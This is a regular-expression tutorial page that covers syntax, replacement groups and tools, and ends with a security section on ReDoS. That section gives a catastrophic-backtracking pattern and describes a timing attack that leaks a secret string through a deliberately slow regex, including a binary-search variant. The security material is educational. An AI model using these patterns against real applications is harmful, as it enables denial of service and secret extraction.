Regular Expressions (RegEx)
Regular Expressions are a syntax for writing patterns to match for. Lot of symbols mean something allowing you to write complex rules in a very short string
Last updated
Regular Expressions are a syntax for writing patterns to match for. Lot of symbols mean something allowing you to write complex rules in a very short string
Last updated
Regular Expressions (RegEx) are a way of writing patterns that many languages understand. Almost every language has some library or way to work with regular expressions, and they are really useful for quickly finding something.
The syntax for RegEx may be hard to read at first. There is not really a way to make comments, and they are supposed to be very compact. But after working with them for a bit and understanding all the rules, you can quickly understand what a RegEx does. One great site that I always use for testing and creating Regular Expressions is RegExr:
Another useful tool to visualize RegExes is Regexper. Just put a RegEx in there, and you'll get a nice image that explains the patterns, groups, etc.
Many languages have some library or native way to interpret Regular Expressions. Here are two examples:
To search through files or command output with these regular expressions, you can use Grep which supports advanced regular expressions using the -P
option (and use '
single quotes to avoid escaping issues).
Lots of code editors (IDEs) also allow you to search through your code using regular expressions. This can be really powerful in combination with the Replacing feature to transform a pattern in your code without doing everything by hand. You can often enable this feature by clicking a .*
button.
The MDN web docs have some detailed explanations of all the special characters RegEx uses, so check those out to fully understand it from the ground up. If you're already a bit familiar with how RegEx works, here's a list of all the special characters and what they do:
.
Any character except newline
\w
\d
\s
Word, digit, whitespace
\W
\D
\S
Not word, digit, whitespace
[abc]
Any of a, b, or c
[^abc]
Not a, b, or c
[a-g]
Character between a & g
^abc$
Start / end of the string
\b
\B
Word, not-word boundary
\.
\*
\\
Escaped special characters
\t
\n
\r
Tab, linefeed, carriage return
(abc)
Capture group
\1
Backreference to group #1
(?:abc)
Non-capturing group
(?=abc)
Positive lookahead
(?!abc)
Negative lookahead
a*a+a?
0 or more, 1 or more, 0 or 1
a{5}a{2,}
Exactly five, two or more
a{1,3}
Between one & three
a+?a{2,}?
Match as few as possible
ab|cd
Match ab or cd
Regular Expressions can also be used to replace matches with something. Using groups with ()
around parts of the pattern, you can even include groups back in the replacement. This is really useful for changing specific things around or in your pattern, without doing it manually. Here are the variables you can use in the replacement string:
$&
: Full match
$1
: First group
$2
: Second group
etc.
You can use the $&
anywhere in your replacement string to insert the full match. This is useful if you want to add some characters around the match, instead of changing it. You can also get any groups with $n
, where n
is the number of the group in your search pattern.
Some implementations of RegEx have a little different syntax for these replacements, Python's re.sub
for example, uses the \1
backslash instead of the $1
dollar sign.
ReDoS stands for "Regular Expression Denial of Service". It is when you have such a computationally expensive search pattern, that the system takes a bit of time before returning the result. This can be used to slow down a system, causing Denial of Service. There are easy pitfalls to make when writing Regular Expressions that make it possible for the computation required for some inputs to go up exponentially, called "Catastrophic Backtracking".
To check if any regex has such a vulnerable pattern, you could use this tool to quickly find out:
It gives you a working example as well. For the (x+x+)+y
RegEx, for example, an input like xxxxxxxxxxxxxxxxxxxxxxxxxx
already takes a few seconds to compute, while adding some more x's will make it run almost forever. With one request, a faulty application may hang when such an input is given and never recover, crashing the application.
While DoS is a possibility, in some specific cases you can gain more from this vulnerability. The timing information can also leak something about the string being matched because some strings will parse faster than others.
If you have control over the Regular Expression, and some secret string is being matched by your RegEx, you could use this to create a RegEx that will be very slow if the first character is an "A", but very fast if the first character is not an "A". Then you can slowly brute-force the secret string character by character.
Such a pattern would be:
A smart regex parser would first look if the string starts with <text>
, and if it does not, it stops instantly because it knows it will never match. Then if it does start with <text>
, it will evaluate the rest of the (((((.*)*)*)*)*)!
which is the computationally expensive part. That way we know that the string being matched starts with <text>
if the application takes long to respond.
Now we can try every possible letter in the place of <text> until the application hangs. Then we save the newly found character and brute-force the next character, etc. See an example implementation I made in Python below:
Because RegEx is so flexible, it is possible to achieve Binary Search performance with your leaks. By providing a range of characters like [a-m]
, the true/false response can tell a lot more than if one certain character is in there.
False means that the whole range can be discarded, and True means the correct character should be somewhere in there. You can provide a smaller range like [a-g]
now to get to your goal in log2()
of the time it would have taken by pure brute-force.
See RegEx Binary Search for an example involving NoSQL Injection
For finding bypasses and edge cases or true values for a Regular Expression, check out the CrossHair: RegEx and more solver.